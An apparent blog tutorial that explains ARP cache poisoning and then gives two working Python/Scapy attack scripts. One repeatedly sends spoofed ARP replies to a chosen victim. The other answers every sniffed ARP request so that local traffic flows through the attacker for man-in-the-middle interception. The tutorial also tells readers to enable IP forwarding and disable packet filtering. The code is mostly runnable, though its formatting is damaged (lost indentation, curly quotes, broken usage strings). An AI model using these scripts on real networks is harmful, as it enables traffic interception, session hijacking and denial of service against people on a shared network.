What is ARP cache Poisoning?

In computer networking, Arp spoofing,ARP cache poison routing, is a technique
by which an attacker sends (spoofed) Address Resolution Protocol(ARP) messages
onto a local area network.Generally, the aim is to associate the attacker’s
MAC address with the IP address of another host, such as the default gateway,
causing any traffic meant for that IP address to be sent to the attacker instead.

Arp spoofing may allow an attacker to intercept data frames on a network, modify
the traffic, or stop all traffic. Often the attack is used as an opening for other
attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the address resolution protocol,
and is limited to local network segments.

How to create an attack using Scapy?

code Part:

import sys
import time
from scapy.all import sendp, ARP, Ether

if len(sys.argv) < 3:
print sys.argv[0] + “: , “
sys.exit(1)

iface = “eth0”
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

ethernet = Ether()
arp = ARP(pdst = target_ip, psrc = fake_ip, op=”is-at”)
packet = ethernet / arp

while True:
sendp(packet, iface=iface)
time.sleep(10)

How did it work?

With the help of Scapy we construct a packet called packet consisting of an
Ether() and an ARP() header. In the ARP header we set the IP address of the
victim (target_ip) and the IP which we would like to hijack all connections
(fake_ip). As last parameter we define the OP-Code is-at, that declares the
packet as an ARP response.Afterwads the function sendp() and not the function
send(), because the packet should be sent on layer 2.The function send() sends
packets on layer 3.

One last thing to remember to enable IP forwarding otherwise your host would
block the connection of the victim.

sysctl net.ipv4.ip_forward=1

Don’t forget to check the settings of your packet filter like IPtables, pf or
ipfw or just disable it.

Man in the middle

A computer that wants to get knowledge about an IP address asks with an ARP
request. I write the program that waits for ARP requests and sends a spoofed in
every received request. In a switched environment this will result in every
connection flowing over the computer of the attacker, because in every ARP cache
there will be the MAC for every IP address. This solution is more elegant and
not as noisy as the one before, but still quite easy to detected for a trained admin

Code Part:

import sys
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) < 2:
print sys.argv[0] + “ “
sys.exit(0)

def arp_poison_callback(packet):

#Got ARP request?
if packet[ARP].op == 1:
    answer = Ether(dst=packet[ARP].hwsrc) / ARP()
    answer[ARP].op = "is-at"
    answer[ARP].hwdst = packet[ARP].hwsrc
    answer[ARP].psrc = packet[ARP].pdst
    answer[ARP].pdst = packet[ARP].psrc

    print "Fooling " + packet[ARP].psrc + " that " + \
            packet[ARP].pdst + " is me"
    sendp(answer, iface=sys.argv[1])

sniff(prn=arp_poison_callback,
filter=”arp”,
iface=sys.argv[1],
store=0
)